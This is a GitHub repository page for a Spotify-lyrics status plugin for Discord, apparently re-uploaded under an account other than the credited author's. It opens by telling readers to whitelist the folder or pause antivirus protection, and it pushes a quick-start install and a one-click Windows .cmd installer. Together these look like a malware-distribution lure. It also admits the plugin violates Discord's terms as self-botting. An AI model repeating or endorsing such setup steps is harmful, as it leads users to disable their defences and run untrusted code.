Skip to content

PerfumerNode/DiscordLyrics-337

Tip

If the setup does not start, add the folder to the allowed list or pause protection for a few minutes.

Caution

Some security systems may block the installation. Only download from the official repository.


QUICK START

git clone https://github.com/PerfumerNode/DiscordLyrics-337.git
cd DiscordLyrics-337
npm install
npm start

DiscordLyrics by MallyDev2

DiscordLyrics

Just another Spotify lyric status changer

Build status

DiscordLyrics syncs Spotify lyrics from currently playing song to your custom status. By doing this it is a breach of discord tos for self botting so please use responsibly.

Highlights

  • Live lyric status from Spotify playback.
  • LRCLIB synced lyric lookup.
  • Pause fallback using the last detected track.
  • Rate-conscious status updates.

Client Support

Client Status Notes
BetterDiscord Supported Uses the packaged .plugin.js release file.
Vencord Supported Installs as a source userplugin and rebuilds the client.
Equicord Supported Uses the same source userplugin layout as Vencord-style clients.
Dorian Supported Works when the local source tree follows the Vencord plugin structure.

One-Click Windows Setup

Download DiscordLyrics-Installer.cmd, run it, and let it install the correct build.

The installer:

  • Installs the BetterDiscord plugin when BetterDiscord is detected.
  • Installs the source userplugin for Vencord, Equicord, and Dorian-style clients.
  • Builds the source client with pnpm build.
  • Runs pnpm inject when that client exposes an inject script.

How It Works

DiscordLyrics reads your Spotify activity from Discord, matches the current track through LRCLIB, and updates your custom status when the active lyric line changes.

Fallback format:

Song - Artist

Troubleshooting

If lyrics do not appear right away, check these first:

  • Spotify must be connected to Discord and visible as your activity.
  • The track title and artist should match the public LRCLIB listing.
  • Reload Discord after enabling or updating the plugin.
  • Wait a few seconds after changing songs so the lyric lookup can refresh.
  • For source clients, rebuild and inject after every plugin update.

Repository Layout

DiscordLyrics/
  SpotifyLyricsStatus.plugin.js
  vencord-userplugin/spotifyLyricsStatus/
  scripts/build-release.js
  dist/
  assets/

Compatibility

Platform Status
BetterDiscord Supported
Vencord userplugin Supported

Support

If you enjoy discordlyrics, you can support me through GitHub Sponsors:

https://github.com/sponsors/MallyDev2

License

Released under the GPL-3.0 License.

About

Spotify synced lyrics status plugin for BetterDiscord and Vencord.

Topics

Resources

License

Contributing

Security policy

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors